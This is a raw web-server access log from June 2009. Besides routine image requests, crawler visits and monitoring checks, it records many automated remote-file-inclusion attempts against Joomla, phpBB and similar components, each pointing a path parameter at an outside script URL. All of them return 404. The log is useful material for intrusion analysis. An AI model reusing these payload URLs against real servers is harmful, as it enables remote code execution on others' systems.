125.18.8.178 - - [19/Jun/2009:02:43:46 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:46 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:46 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:46 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:48 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:48 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:48 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:48 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:48 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:48 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:48 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:48 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:48 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:48 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:48 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
209.59.12.99 - - [19/Jun/2009:02:43:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.18.8.178 - - [19/Jun/2009:02:45:18 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
61.222.190.185 - - [19/Jun/2009:02:45:47 -0400] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:02:45:48 -0400] "GET /logs/access_log.Q108012000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
61.222.190.185 - - [19/Jun/2009:02:45:48 -0400] "GET /logs/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.222.190.185 - - [19/Jun/2009:02:45:48 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:02:45:52 -0400] "GET /images/over-index10_electrode.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
218.38.16.107 - - [19/Jun/2009:02:46:19 -0400] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.38.16.107 - - [19/Jun/2009:02:46:19 -0400] "GET /logs/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.16.107 - - [19/Jun/2009:02:46:28 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
195.56.77.54 - - [19/Jun/2009:02:46:44 -0400] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
195.56.77.54 - - [19/Jun/2009:02:46:44 -0400] "GET /logs/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
195.56.77.54 - - [19/Jun/2009:02:46:44 -0400] "GET /logs/access_log.Q109060900/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
119.73.47.84 - - [19/Jun/2009:02:46:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6)"
119.73.47.84 - - [19/Jun/2009:02:46:56 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6)"
119.73.47.84 - - [19/Jun/2009:02:47:02 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6)"
119.73.47.84 - - [19/Jun/2009:02:47:05 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6)"
61.222.190.185 - - [19/Jun/2009:02:47:14 -0400] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.56.77.54 - - [19/Jun/2009:02:47:30 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
61.222.190.185 - - [19/Jun/2009:02:48:24 -0400] "GET /logs/access_log.Q109060900%20%20/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
61.222.190.185 - - [19/Jun/2009:02:48:24 -0400] "GET /logs/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.222.190.185 - - [19/Jun/2009:02:48:28 -0400] "GET /logs/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.222.190.185 - - [19/Jun/2009:02:48:29 -0400] "GET /logs/access_log.Q109060900/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
61.222.190.185 - - [19/Jun/2009:02:48:29 -0400] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
119.73.47.84 - - [19/Jun/2009:02:48:32 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
119.73.47.84 - - [19/Jun/2009:02:48:32 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
119.73.47.84 - - [19/Jun/2009:02:48:42 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
119.73.47.84 - - [19/Jun/2009:02:48:42 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
218.38.16.107 - - [19/Jun/2009:02:48:49 -0400] "GET /logs/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.16.107 - - [19/Jun/2009:02:48:50 -0400] "GET /logs/access_log.Q109060900/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
218.38.16.107 - - [19/Jun/2009:02:48:50 -0400] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:02:48:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.230.22.39 - - [19/Jun/2009:02:49:27 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:02:49:27 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:02:49:27 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:02:49:36 -0400] "GET /logs/access_log.Q109060100/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:02:50:02 -0400] "GET /logs/access_log.Q108103000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
61.222.190.185 - - [19/Jun/2009:02:51:36 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
202.60.70.28 - - [19/Jun/2009:02:51:40 -0400] "GET /logs/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 261 "-" "libwww-perl/5.811"
202.60.70.28 - - [19/Jun/2009:02:51:40 -0400] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 256 "-" "libwww-perl/5.811"
202.60.70.28 - - [19/Jun/2009:02:51:40 -0400] "GET /logs/error_log.Q109051200/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 282 "-" "libwww-perl/5.811"
202.60.70.28 - - [19/Jun/2009:02:51:40 -0400] "GET /logs/access_log.Q109060900/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 283 "-" "libwww-perl/5.811"
87.230.22.39 - - [19/Jun/2009:02:52:14 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:02:52:18 -0400] "GET /logs/access_log.Q109060100%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:02:53:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.149.105.23 - - [19/Jun/2009:02:54:15 -0400] "GET /logs/access_log.Q109051800//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.79"
213.149.105.23 - - [19/Jun/2009:02:54:15 -0400] "GET //components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
213.149.105.23 - - [19/Jun/2009:02:54:15 -0400] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
66.249.71.14 - - [19/Jun/2009:02:54:17 -0400] "GET /images/index4_impltmotrs.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
213.149.105.23 - - [19/Jun/2009:02:54:51 -0400] "GET /logs/error_log.Q109061000//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
83.98.209.71 - - [19/Jun/2009:02:55:30 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:55:31 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
95.154.216.25 - - [19/Jun/2009:02:56:06 -0400] "GET /logs/access_log.Q109052100/admin/editor2/spaw_control.class.php?spaw_root=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
95.154.216.25 - - [19/Jun/2009:02:56:06 -0400] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
95.154.216.25 - - [19/Jun/2009:02:56:06 -0400] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
84.201.208.50 - - [19/Jun/2009:02:56:22 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
84.201.208.50 - - [19/Jun/2009:02:56:23 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:02:57:43 -0400] "GET //include/mail.inc.php?skin_board_path=http://125.163.251.219/har/fx29id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:02:57:57 -0400] "GET //include/mail.inc.php?skin_board_path=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:02:57:58 -0400] "GET //include/mail.inc.php?skin_board_path=http://125.163.251.219/har/fx29id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:02:58:20 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://125.163.251.219/har/fx29id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:02:58:20 -0400] "GET /logs/access_log.Q109060100//include/mail.inc.php?skin_board_path=http://125.163.251.219/har/fx29id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:02:58:36 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://125.163.251.219/har/fx29id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:02:58:36 -0400] "GET /logs/access_log.Q109060100//include/mail.inc.php?skin_board_path=http://125.163.251.219/har/fx29id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:02:58:40 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:02:58:40 -0400] "GET /logs/access_log.Q109060100//include/mail.inc.php?skin_board_path=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:02:58:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
38.99.13.118 - - [19/Jun/2009:02:59:01 -0400] "GET /logs/error_log.Q107091800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
95.154.216.25 - - [19/Jun/2009:02:59:16 -0400] "GET /logs/access_log.Q109052100/admin/editor2/spaw_control.class.php?spaw_root=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
95.154.216.25 - - [19/Jun/2009:02:59:16 -0400] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
95.154.216.25 - - [19/Jun/2009:02:59:16 -0400] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
213.149.105.23 - - [19/Jun/2009:02:59:40 -0400] "GET /logs/access_log.Q109051800//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.79"
213.149.105.23 - - [19/Jun/2009:02:59:40 -0400] "GET //components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
213.149.105.23 - - [19/Jun/2009:02:59:40 -0400] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
213.149.105.23 - - [19/Jun/2009:03:00:25 -0400] "GET /logs/error_log.Q109061000//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
94.23.200.54 - - [19/Jun/2009:03:02:28 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:02:28 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:02:28 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:03:02:44 -0400] "GET /images/index6_patdraps.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
94.23.200.54 - - [19/Jun/2009:03:02:50 -0400] "GET /logs/access_log.Q109052900%20%20//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:03:03:00 -0400] "GET /logs/error_log.Q107122100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
38.99.13.118 - - [19/Jun/2009:03:06:18 -0400] "GET /logs/access_log.Q108070200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
209.59.12.99 - - [19/Jun/2009:03:06:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.49.99.7 - - [19/Jun/2009:03:07:41 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:03:07:45 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:10:22 -0400] "GET /logs/access_log.Q109051700//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:10:34 -0400] "GET /logs/access_log.Q109052900//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
95.154.216.25 - - [19/Jun/2009:03:10:59 -0400] "GET /logs/error_log.Q109052100/admin/editor2/spaw_control.class.php?spaw_root=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
66.249.71.14 - - [19/Jun/2009:03:11:09 -0400] "GET /images/logo_11.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
209.59.12.99 - - [19/Jun/2009:03:11:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.49.99.7 - - [19/Jun/2009:03:11:29 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:03:11:29 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
124.138.156.3 - - [19/Jun/2009:03:11:32 -0400] "GET /includes/functions_admin.php?phpbb_root_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
124.138.156.3 - - [19/Jun/2009:03:11:32 -0400] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:03:11:33 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.138.156.3 - - [19/Jun/2009:03:11:33 -0400] "GET /logs/access_log.Q109053100/includes/functions_admin.php?phpbb_root_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
